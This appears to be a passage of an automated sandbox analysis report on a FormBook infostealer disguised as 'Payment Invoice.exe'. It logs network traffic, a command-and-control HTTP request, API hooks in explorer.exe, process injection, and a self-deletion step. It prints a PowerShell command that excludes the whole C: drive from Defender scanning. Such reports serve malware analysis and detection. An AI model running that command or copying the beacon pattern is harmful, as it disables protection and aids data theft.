                                                    Apr 12, 2021 14:41:19.516343117 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516351938 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.516408920 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.516482115 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.516489029 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649198055 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649215937 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649287939 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649302959 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649322987 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649343014 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649346113 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649362087 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649410009 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649431944 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649435997 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649457932 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649480104 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649498940 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649502039 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649523973 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.649552107 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.649595022 CEST4976080192.168.2.4198.185.159.144

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 12, 2021 14:39:11.788572073 CEST5912353192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:11.849502087 CEST53591238.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:28.246284008 CEST5453153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:28.296607018 CEST53545318.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:34.836317062 CEST4971453192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:34.887165070 CEST53497148.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:36.461183071 CEST5802853192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:36.510087013 CEST53580288.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:40.518122911 CEST5309753192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:40.569143057 CEST53530978.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:45.033421993 CEST4925753192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:45.092379093 CEST53492578.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:56.668689013 CEST6238953192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:56.717528105 CEST53623898.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:57.659349918 CEST4991053192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:57.712431908 CEST53499108.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:39:58.615314960 CEST5585453192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:39:58.668315887 CEST53558548.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:04.775096893 CEST6454953192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:04.832498074 CEST53645498.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:05.496288061 CEST6315353192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:05.556891918 CEST5299153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:05.580235958 CEST53631538.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:05.616993904 CEST53529918.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:06.443831921 CEST5370053192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:06.500834942 CEST53537008.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:07.145061970 CEST5172653192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:07.208156109 CEST53517268.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:07.279871941 CEST5679453192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:07.342111111 CEST53567948.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:07.852077961 CEST5653453192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:07.900767088 CEST53565348.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:08.584896088 CEST5662753192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:08.646239996 CEST53566278.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:09.277481079 CEST5662153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:09.334768057 CEST53566218.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:10.425539970 CEST6311653192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:10.484303951 CEST53631168.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:11.694168091 CEST6407853192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:11.745222092 CEST53640788.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:12.221942902 CEST6480153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:12.279324055 CEST53648018.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:20.483020067 CEST6172153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:20.540050030 CEST53617218.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:28.365004063 CEST5125553192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:28.416538954 CEST53512558.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:33.573276043 CEST6152253192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:33.624902010 CEST53615228.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:34.473867893 CEST5233753192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:34.522449017 CEST53523378.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:35.601871014 CEST5504653192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:35.663249016 CEST53550468.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:38.521826982 CEST4961253192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:38.572782993 CEST53496128.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:56.826630116 CEST4928553192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:56.903141975 CEST53492858.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:58.670516014 CEST5060153192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:58.941359997 CEST53506018.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:40:59.410506010 CEST6087553192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:40:59.485570908 CEST53608758.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:41:00.884249926 CEST5644853192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:41:00.933099031 CEST53564488.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:41:02.038280964 CEST5917253192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:41:02.087215900 CEST53591728.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:41:16.088772058 CEST6242053192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:41:16.138391018 CEST53624208.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:41:16.929337025 CEST6057953192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:41:16.978096008 CEST53605798.8.8.8192.168.2.4
                                                    Apr 12, 2021 14:41:19.153084993 CEST5018353192.168.2.48.8.8.8
                                                    Apr 12, 2021 14:41:19.246695042 CEST53501838.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Apr 12, 2021 14:40:58.670516014 CEST192.168.2.48.8.8.80x91d7Standard query (0)www.the-techs.infoA (IP address)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.153084993 CEST192.168.2.48.8.8.80x6b6fStandard query (0)www.minterfortexas.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Apr 12, 2021 14:40:58.941359997 CEST8.8.8.8192.168.2.40x91d7Name error (3)www.the-techs.infononenoneA (IP address)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.246695042 CEST8.8.8.8192.168.2.40x6b6fNo error (0)www.minterfortexas.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.246695042 CEST8.8.8.8192.168.2.40x6b6fNo error (0)ext-cust.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.246695042 CEST8.8.8.8192.168.2.40x6b6fNo error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.246695042 CEST8.8.8.8192.168.2.40x6b6fNo error (0)ext-cust.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                    Apr 12, 2021 14:41:19.246695042 CEST8.8.8.8192.168.2.40x6b6fNo error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.minterfortexas.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.449760198.185.159.14480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Apr 12, 2021 14:41:19.383213043 CEST5771OUTGET /chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP HTTP/1.1
                                                    Host: www.minterfortexas.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Apr 12, 2021 14:41:19.516170025 CEST5773INHTTP/1.1 400 Bad Request
                                                    Cache-Control: no-cache, must-revalidate
                                                    Content-Length: 77564
                                                    Content-Type: text/html; charset=UTF-8
                                                    Date: Mon, 12 Apr 2021 12:41:19 UTC
                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                    Pragma: no-cache
                                                    Server: Squarespace
                                                    X-Contextid: RnSXHzn7/on0jWjJG
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE2
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE2
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE2
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE2

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:14:39:17
                                                    Start date:12/04/2021
                                                    Path:C:\Users\user\Desktop\Payment Invoice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\Payment Invoice.exe'
                                                    Imagebase:0x4e0000
                                                    File size:669184 bytes
                                                    MD5 hash:EBFEAA73811B084FF7EC882503205988
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.720423226.00000000029B1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000003.712145494.0000000007311000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.640844843.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:14:39:50
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'powershell' Add-MpPreference -ExclusionPath C:\
                                                    Imagebase:0xab0000
                                                    File size:430592 bytes
                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Start time:14:39:50
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:39:51
                                                    Start date:12/04/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                                                    Imagebase:0x140000
                                                    File size:669184 bytes
                                                    MD5 hash:EBFEAA73811B084FF7EC882503205988
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000000.713411338.0000000000142000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 29%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:14:39:51
                                                    Start date:12/04/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                                                    Imagebase:0xc20000
                                                    File size:669184 bytes
                                                    MD5 hash:EBFEAA73811B084FF7EC882503205988
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000000.715166926.0000000000C22000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.781781512.0000000000C22000.00000002.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:14:39:54
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff6fee60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:40:19
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\SysWOW64\autoconv.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                    Imagebase:0xd00000
                                                    File size:851968 bytes
                                                    MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:14:40:20
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\SysWOW64\WWAHost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                    Imagebase:0x240000
                                                    File size:829856 bytes
                                                    MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.909529703.00000000007AA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.912797173.0000000003BEF000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:14:40:24
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:40:25
                                                    Start date:12/04/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >